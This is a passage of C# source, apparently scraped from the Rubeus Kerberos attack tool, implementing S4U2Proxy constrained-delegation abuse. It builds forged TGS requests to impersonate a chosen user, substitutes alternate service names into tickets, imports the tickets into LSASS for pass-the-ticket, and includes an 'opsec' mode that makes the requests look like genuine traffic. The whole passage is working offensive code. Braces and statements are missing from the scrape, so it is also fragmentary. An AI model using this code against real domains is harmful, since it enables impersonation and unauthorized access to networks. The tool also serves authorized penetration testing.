                    string kirbiString = Convert.ToBase64String(kirbiBytes);

                    Console.WriteLine("[*] base64(ticket.kirbi) for SPN '{0}':\r\n", targetSPN);

                    // display the .kirbi base64, columns of 80 chararacters
                    foreach (string line in Helpers.Split(kirbiString, 80))
                        Console.WriteLine("      {0}", line);

                    if (!String.IsNullOrEmpty(outfile))
                        string filename = $"{Helpers.GetBaseFromFilename(outfile)}_{targetSPN}{Helpers.GetExtensionFromFilename(outfile)}";
                        filename = Helpers.MakeValidFileName(filename);
                        if (Helpers.WriteBytesToFile(filename, kirbiBytes))
                            Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", filename);

                    if (ptt)
                        // pass-the-ticket -> import into LSASS
                        LSA.ImportTicket(kirbiBytes, new Interop.LUID());
            else if (responseTag == 30)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
Exemple #29
        private static void S4U2Proxy(KRB_CRED kirbi, string targetUser, string targetSPN, string outfile, bool ptt, string domainController = "", string altService = "", KRB_CRED tgs = null, bool opsec = false, string proxyUrl = null, string createnetonly = null, bool show = false)
            Console.WriteLine("[*] Impersonating user '{0}' to target SPN '{1}'", targetUser, targetSPN);
            if (!String.IsNullOrEmpty(altService))
                string[] altSnames = altService.Split(',');
                if (altSnames.Length == 1)
                    Console.WriteLine("[*]   Final ticket will be for the alternate service '{0}'", altService);
                    Console.WriteLine("[*]   Final tickets will be for the alternate services '{0}'", altService);

            // extract out the info needed for the TGS-REQ/S4U2Proxy execution
            string userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
            string domain   = kirbi.enc_part.ticket_info[0].prealm;
            Ticket ticket   = kirbi.tickets[0];

            byte[]             clientKey = kirbi.enc_part.ticket_info[0].key.keyvalue;
            Interop.KERB_ETYPE etype     = (Interop.KERB_ETYPE)kirbi.enc_part.ticket_info[0].key.keytype;

            Console.WriteLine("[*] Building S4U2proxy request for service: '{0}'", targetSPN);
            TGS_REQ s4u2proxyReq = new TGS_REQ(!opsec);

            s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions | Interop.KdcOptions.CONSTRAINED_DELEGATION;

            s4u2proxyReq.req_body.realm = domain;

            string[] parts      = targetSPN.Split('/');
            string   serverName = parts[parts.Length - 1];

            s4u2proxyReq.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_SRV_INST;
            foreach (string part in parts)

            // supported encryption types

            // add in the ticket from the S4U2self response

            // needed for authenticator checksum
            byte[] cksum_Bytes = null;

            // the rest of the opsec changes
            if (opsec)
                // remove renewableok and add canonicalize
                s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions & ~Interop.KdcOptions.RENEWABLEOK;
                s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions | Interop.KdcOptions.CANONICALIZE;

                // 15 minutes in the future like genuine requests
                DateTime till = DateTime.Now;
                till = till.AddMinutes(15);
                s4u2proxyReq.req_body.till = till;

                // extra etypes

                // get hostname and hostname of SPN
                string hostName = Dns.GetHostName().ToUpper();
                string targetHostName;
                if (parts.Length > 1)
                    targetHostName = parts[1].Substring(0, parts[1].IndexOf('.')).ToUpper();
                    targetHostName = hostName;

                // create enc-authorization-data if target host is not the local machine
                if (hostName != targetHostName)
                    // authdata requires key and etype from tgs
                    byte[]             tgsKey   = tgs.enc_part.ticket_info[0].key.keyvalue;
                    Interop.KERB_ETYPE tgsEtype = (Interop.KERB_ETYPE)tgs.enc_part.ticket_info[0].key.keytype;

                    ADIfRelevant       ifrelevant   = new ADIfRelevant();
                    ADRestrictionEntry restrictions = new ADRestrictionEntry();
                    ADKerbLocal        kerbLocal    = new ADKerbLocal();
                    AsnElt authDataSeq = ifrelevant.Encode();
                    authDataSeq = AsnElt.Make(AsnElt.SEQUENCE, authDataSeq);
                    byte[] authorizationDataBytes = authDataSeq.Encode();
                    byte[] enc_authorization_data = Crypto.KerberosEncrypt(tgsEtype, Interop.KRB_KEY_USAGE_TGS_REQ_ENC_AUTHOIRZATION_DATA, tgsKey, authorizationDataBytes);
                    s4u2proxyReq.req_body.enc_authorization_data = new EncryptedData((Int32)tgsEtype, enc_authorization_data);

                // encode req_body for authenticator cksum
                AsnElt req_Body_ASN    = s4u2proxyReq.req_body.Encode();
                AsnElt req_Body_ASNSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { req_Body_ASN });
                req_Body_ASNSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 4, req_Body_ASNSeq);
                byte[] req_Body_Bytes = req_Body_ASNSeq.CopyValue();
                cksum_Bytes = Crypto.KerberosChecksum(clientKey, req_Body_Bytes, Interop.KERB_CHECKSUM_ALGORITHM.KERB_CHECKSUM_RSA_MD5);

            // moved to end so we can have the checksum in the authenticator
            PA_DATA padata = new PA_DATA(domain, userName, ticket, clientKey, etype, opsec, cksum_Bytes);

            PA_DATA pac_options = new PA_DATA(false, false, false, true);


            byte[] s4ubytes = s4u2proxyReq.Encode().Encode();

            byte[] response2 = null;

            if (String.IsNullOrEmpty(proxyUrl))
                string dcIP = Networking.GetDCIP(domainController);
                if (String.IsNullOrEmpty(dcIP))

                Console.WriteLine("[*] Sending S4U2proxy request to domain controller {0}:88", dcIP);

                response2 = Networking.SendBytes(dcIP, 88, s4ubytes);
                Console.WriteLine("[*] Sending S4U2proxy request via KDC proxy: {0}", proxyUrl);
                KDC_PROXY_MESSAGE message = new KDC_PROXY_MESSAGE(s4ubytes);
                message.target_domain = domain;
                response2             = Networking.MakeProxyRequest(proxyUrl, message);
            if (response2 == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response2, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.TGS_REP)
                Console.WriteLine("[+] S4U2proxy success!");

                // parse the response to an TGS-REP
                TGS_REP rep2 = new TGS_REP(responseAsn);

                // https://github.com/gentilkiwi/kekeo/blob/master/modules/asn1/kull_m_kerberos_asn1.h#L62
                byte[]        outBytes2   = Crypto.KerberosDecrypt(etype, 8, clientKey, rep2.enc_part.cipher);
                AsnElt        ae2         = AsnElt.Decode(outBytes2, false);
                EncKDCRepPart encRepPart2 = new EncKDCRepPart(ae2.Sub[0]);

                if (!String.IsNullOrEmpty(altService))
                    string[] altSnames = altService.Split(',');

                    foreach (string altSname in altSnames)
                        // now build the final KRB-CRED structure with one or more alternate snames
                        KRB_CRED cred = new KRB_CRED();

                        // since we want an alternate sname, first substitute it into the ticket structure
                        rep2.ticket.sname.name_string[0] = altSname;

                        // add the ticket

                        // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                        KrbCredInfo info = new KrbCredInfo();

                        // [0] add in the session key
                        info.key.keytype  = encRepPart2.key.keytype;
                        info.key.keyvalue = encRepPart2.key.keyvalue;

                        // [1] prealm (domain)
                        info.prealm = encRepPart2.realm;

                        // [2] pname (user)
                        info.pname.name_type   = rep2.cname.name_type;
                        info.pname.name_string = rep2.cname.name_string;

                        // [3] flags
                        info.flags = encRepPart2.flags;

                        // [4] authtime (not required)

                        // [5] starttime
                        info.starttime = encRepPart2.starttime;

                        // [6] endtime
                        info.endtime = encRepPart2.endtime;

                        // [7] renew-till
                        info.renew_till = encRepPart2.renew_till;

                        // [8] srealm
                        info.srealm = encRepPart2.realm;

                        // [9] sname
                        info.sname.name_type   = encRepPart2.sname.name_type;
                        info.sname.name_string = encRepPart2.sname.name_string;

                        // if we want an alternate sname, substitute it into the encrypted portion of the KRB_CRED
                        Console.WriteLine("[*] Substituting alternative service name '{0}'", altSname);
                        info.sname.name_string[0] = altSname;

                        // add the ticket_info into the cred object

                        byte[] kirbiBytes = cred.Encode().Encode();

                        string kirbiString = Convert.ToBase64String(kirbiBytes);

                        Console.WriteLine("[*] base64(ticket.kirbi) for SPN '{0}/{1}':\r\n", altSname, serverName);

                        if (Rubeus.Program.wrapTickets)
                            // display the .kirbi base64, columns of 80 chararacters
                            foreach (string line in Helpers.Split(kirbiString, 80))
                                Console.WriteLine("      {0}", line);
                            Console.WriteLine("      {0}", kirbiString);

                        if (!String.IsNullOrEmpty(outfile))
                            string filename = $"{Helpers.GetBaseFromFilename(outfile)}_{altSname}-{serverName}{Helpers.GetExtensionFromFilename(outfile)}";
                            filename = Helpers.MakeValidFileName(filename);
                            if (Helpers.WriteBytesToFile(filename, kirbiBytes))
                                Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", filename);

                        if (ptt)
                            // pass-the-ticket -> import into LSASS
                            ImportTicket(kirbiBytes, createnetonly, show);
                    // now build the final KRB-CRED structure, no alternate snames
                    KRB_CRED cred = new KRB_CRED();

                    // if we want an alternate sname, first substitute it into the ticket structure
                    if (!String.IsNullOrEmpty(altService))
                        rep2.ticket.sname.name_string[0] = altService;

                    // add the ticket

                    // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                    KrbCredInfo info = new KrbCredInfo();

                    // [0] add in the session key
                    info.key.keytype  = encRepPart2.key.keytype;
                    info.key.keyvalue = encRepPart2.key.keyvalue;

                    // [1] prealm (domain)
                    info.prealm = encRepPart2.realm;

                    // [2] pname (user)
                    info.pname.name_type   = rep2.cname.name_type;
                    info.pname.name_string = rep2.cname.name_string;

                    // [3] flags
                    info.flags = encRepPart2.flags;

                    // [4] authtime (not required)

                    // [5] starttime
                    info.starttime = encRepPart2.starttime;

                    // [6] endtime
                    info.endtime = encRepPart2.endtime;

                    // [7] renew-till
                    info.renew_till = encRepPart2.renew_till;

                    // [8] srealm
                    info.srealm = encRepPart2.realm;

                    // [9] sname
                    info.sname.name_type   = encRepPart2.sname.name_type;
                    info.sname.name_string = encRepPart2.sname.name_string;

                    // add the ticket_info into the cred object

                    byte[] kirbiBytes = cred.Encode().Encode();

                    string kirbiString = Convert.ToBase64String(kirbiBytes);

                    Console.WriteLine("[*] base64(ticket.kirbi) for SPN '{0}':\r\n", targetSPN);

                    if (Rubeus.Program.wrapTickets)
                        // display the .kirbi base64, columns of 80 chararacters
                        foreach (string line in Helpers.Split(kirbiString, 80))
                            Console.WriteLine("      {0}", line);
                        Console.WriteLine("      {0}", kirbiString);

                    if (!String.IsNullOrEmpty(outfile))
                        string filename = $"{Helpers.GetBaseFromFilename(outfile)}_{targetSPN}{Helpers.GetExtensionFromFilename(outfile)}";
                        filename = Helpers.MakeValidFileName(filename);
                        if (Helpers.WriteBytesToFile(filename, kirbiBytes))
                            Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", filename);

                    if (ptt)
                        // pass-the-ticket -> import into LSASS
                        ImportTicket(kirbiBytes, createnetonly, show);
            else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
 public KERB_PA_PAC_REQUEST(AsnElt value)
     include_pac = value.Sub[0].Sub[0].GetBoolean();